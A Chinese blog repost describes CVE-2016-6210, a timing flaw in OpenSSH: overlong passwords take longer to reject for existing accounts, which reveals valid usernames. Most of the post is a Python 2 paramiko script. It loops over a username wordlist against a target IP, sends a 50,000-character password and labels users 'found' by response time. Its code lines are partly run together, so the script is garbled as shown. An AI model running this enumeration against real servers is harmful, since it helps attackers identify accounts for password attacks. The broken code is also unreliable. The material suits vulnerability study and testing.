博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
OpenSSH利用处理畸形长度密码造成的时间差,枚举系统用户(CVE-2016-6210)
阅读量:6085 次
发布时间:2019-06-20

本文共 1013 字,大约阅读时间需要 3 分钟。

受影响版本:

opensshd(< =最新版本)

CVE-2016-6210

漏洞描述:

当我们使用ssh客户端去连接服务端的时候,如果向服务端发送一个大于10KB的密码,由于OpenSSH服务端会对user:password的组合,使用加密算法SHA256/SHA512进行加密。
如果我们传输的是一个不存在的用户名,那么就不会进入sha256(user,password)加密流程,如果用户名存在,服务器将会针对这个10KB大的密码进行SHA256的加密,这里就会产生时间差。

 

测试脚本:

import paramiko import timeimport sysfrom fileutils import FileUtilsdef get_user(ip,user):    p='A'*50000     ssh = paramiko.SSHClient()     starttime=time.clock()     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())     try:         ssh.connect(ip, username=user, password=p)     except:         endtime=time.clock()        total=endtime-starttime     return (total)         if __name__ == '__main__':    ip = sys.argv[1]    for user in FileUtils.getLines('user.lst'):        try:            i = get_user(ip,user)        except Exception,e:            print str(e)        if i > 5.0:            print '%s : %s : %s found' % (ip , user,i)        else:            print '%s : %s : %s no found' % (ip,user,i)

转载于:https://www.cnblogs.com/persuit/p/5691259.html

你可能感兴趣的文章
Longest Substring Without Repeating Characters
查看>>
Using the memcached telnet interface
查看>>
as3 AIR 添加或删除ApplicationDirectory目录下文件
查看>>
浅析伪数组
查看>>
验证码生成 点击刷新 ajax校验
查看>>
THINKPHP 默认模板路径替换
查看>>
mysql5.7 windows7编码统一utf-8
查看>>
nyoj-回文字符串--动态规划
查看>>
.Net Core 实践 - 使用log4net记录日志(2)
查看>>
洛谷 P1443 马的遍历
查看>>
部署腾讯云(CentOS6.6版本,jdk1.7+tomcat8+mysql)
查看>>
magento-installation: Magento SSL Error 310 net::ERR_TOO_MANY_REDIRECTS
查看>>
springboot跨域问题
查看>>
nginx搭建mp4和flv播放器
查看>>
CGI的函数
查看>>
异常与日志
查看>>
神经网络实现连续型变量的回归预测(python)
查看>>
python中关于正则表达式三
查看>>
努力吧.关于工厂模式(一)
查看>>
Python逻辑判断顺序
查看>>